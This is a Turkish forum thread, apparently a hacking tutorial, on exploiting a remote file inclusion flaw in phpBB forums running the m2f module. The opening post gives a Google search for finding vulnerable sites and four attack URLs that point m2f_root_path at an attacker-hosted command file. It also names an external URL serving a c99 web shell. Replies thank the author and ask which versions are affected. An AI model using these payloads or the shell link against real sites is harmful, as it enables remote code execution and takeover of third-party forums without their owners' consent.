

Phpbb Remote File İnclusion Anlatımı
-
sealm arkadaşlar.fazla geyik yapmadan konuya girece...yeniyseniz sizin için burda pek bişey olduunu sanmıyorum.
rfi kodlama açıklarından kaynaklardna dolayı uzaktan kod çalıştırmamıza yarıyor..şimdi phpbb sitelerde bunu görücez..
googlea girin ve;
allinurl:/m2f_usercp.php?
diye aratın karşımıza bir sürü site çıkacak.sitelerin sonuna eklemeler yapacaız yani sitelr şöle olacak;
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
forum pathhet ötesini yapıstıracaksnız ve
http://[attacker] yerine size vereceim shelli kullanacaksınız...
şunu:
http://mythvirus.t35.com/c99.txt?
ondan sonrasını daha önceki dökümanda anlatmıştım..
alıntı falan değildir.bişe yazmasanız bile saçma sapan şeyler yazmassanız sevinirim...
-
saolasın üstat deneyelim bi
-
hangi sürümlerde işlediini belirtirsen çok daa ii olur antimoksidanım
-
banlanmis oksidan ım harbiden seviniriz hangilerin yaradğını söylersen
Toplam Hit: 1320 Toplam Mesaj: 4